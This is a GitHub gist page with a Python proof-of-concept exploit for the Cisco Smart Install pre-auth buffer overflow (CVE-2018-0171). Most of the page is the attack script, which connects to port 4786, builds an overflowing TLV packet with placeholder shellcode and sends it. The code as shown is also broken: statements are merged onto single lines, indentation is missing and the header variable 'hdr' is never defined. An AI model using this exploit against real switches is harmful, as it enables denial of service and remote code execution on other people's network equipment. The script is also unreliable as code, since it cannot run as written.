Skip to content

Instantly share code, notes, and snippets.

@pich4ya

pich4ya/smi_ibc_init_discovery_BoF.py

Created April 1, 2018 16:21
Show Gist options
  • Save pich4ya/d03574b4613bff095621472367465a7e to your computer and use it in GitHub Desktop.
Save pich4ya/d03574b4613bff095621472367465a7e to your computer and use it in GitHub Desktop.
Download ZIP
Cisco Smart Install Client - Pre-Auth RCE (CVE-2018-0171) from https://embedi.com/blog/cisco-smart-install-remote-code-execution/
Raw
smi_ibc_init_discovery_BoF.py
# smi_ibc_init_discovery_BoF.py
import socket
import struct
from optparse import OptionParser
# Parse the target options
parser = OptionParser()
parser.add_option("-t", "--target", dest="target", help="Smart Install Client", default="192.168.1.1") parser.add_option("-p", "--port", dest="port", type="int", help="Port of Client", default=4786) (options, args) = parser.parse_args()
def craft_tlv(t, v, t_fmt='!I', l_fmt='!I'):
return struct.pack(t_fmt, t) + struct.pack(l_fmt, len(v)) + v
def send_packet(sock, packet):
sock.send(packet)
def receive(sock):
return sock.recv()
if __name__ == "__main__":
print "[*] Connecting to Smart Install Client ", options.target, "port", options.port
con = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
con.connect((options.target, options.port))
payload = 'BBBB' * 44 shellcode = 'D' * 2048
data = 'A' * 36 + struct.pack('!I', len(payload) + len(shellcode) + 40) + payload
tlv_1 = craft_tlv(0x00000001, data) tlv_2 = shellcode
pkt = hdr + tlv_1 + tlv_2
print "[*] Send a malicious packet"
send_packet(con, pkt)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment